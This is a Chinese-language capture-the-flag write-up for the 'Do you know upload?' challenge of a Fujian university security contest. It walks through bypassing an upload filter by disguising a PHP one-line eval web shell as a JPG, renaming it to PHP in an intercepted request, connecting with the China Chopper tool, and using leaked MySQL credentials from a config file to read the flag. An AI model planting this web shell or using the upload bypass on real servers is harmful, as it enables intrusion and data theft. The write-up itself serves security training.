第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP


上传绕过,菜刀连接数据库


题目描述

在这里插入图片描述

解题思路

在这里插入图片描述
写的明明白白,图片上传,用txt写个一句话再把后缀改成jpg即可,一句话:

<?php @eval($_POST['caidao']);?>

上传,抓包
在这里插入图片描述
jpg改为php,GOGOGO发包
在这里插入图片描述
得到上传路径,用菜刀链接
在这里插入图片描述
进去后发现并没有FLAG,不过有一个配置文件,里面有数据库的账号和密码
在这里插入图片描述
在这里插入图片描述
菜刀连接,配置一下

<T>MYSQL</T>
<H>localhost</H>
<U>ctf</U>
<P>ctfctfctf</P>

在这里插入图片描述
右键数据库管理,拿flag

得到FLAG

直接双击flag没有回显,改一下查询命令即可
在这里插入图片描述
在这里插入图片描述
flag{8ec2465a-86fc-4513-8e66-1b8cce1958e0}


END


文章作者: yq1ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yq1ng !
评论
  目录